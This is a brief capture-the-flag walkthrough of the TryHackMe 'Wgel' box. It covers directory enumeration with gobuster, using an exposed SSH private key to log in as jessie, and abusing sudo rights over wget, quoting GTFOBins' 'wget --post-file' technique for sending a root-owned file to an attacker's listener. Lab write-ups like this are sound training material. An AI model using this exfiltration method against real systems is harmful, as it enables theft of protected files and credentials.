THM - Wegl
Can you exfiltrate the root flag?
Dunno, but since this is a easy rated box I give myself a fighting chance. Let’s begin.
nmap says we’ve got 22 (SSH) and 80 (HTTP) only.
The homepage for the website is just the Apache default page, with one exception - a comment for Jessie. So perhaps that’s our username.
Gobuster is a place to start:
root@kali:/opt/tryhackme/wgel# gobuster dir -u http://10.10.34.196 -w /usr/share/wordlists/dirb/common.txt
This turns up one interesting directory - sitemap. Checking that we get a whole host of pages; basically an incomplete blog/business site. It’s called unapp, but that doesn’t turn up anything on searchsploit, so let’s gobuster in the sitemap directory:
root@kali:/opt/tryhackme/wgel# gobuster dir -u http://10.10.34.196/sitemap -w /usr/share/wordlists/dirb/common.txt
Doing that, we find .ssh/id_rsa. Bingo.
Once we’ve downloaded the ssh key, we can chmod 600 it and then login:
root@kali:/opt/tryhackme/wgel# ssh -i id_rsa email@example.com
Then we run sudo -l:
Jessie has got the user flag, and we can run wget as root. What can we do with that? Well, the box hint was about exfiltrating the root flag.
GTFOBins says we can exfiltrate files:
Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is, instruct the service to not URL-decode the body. Use –post-data to send hard-coded data.
wget –post-file=$LFILE $URL
So let’s try that:
And on the receiving end I used netcat: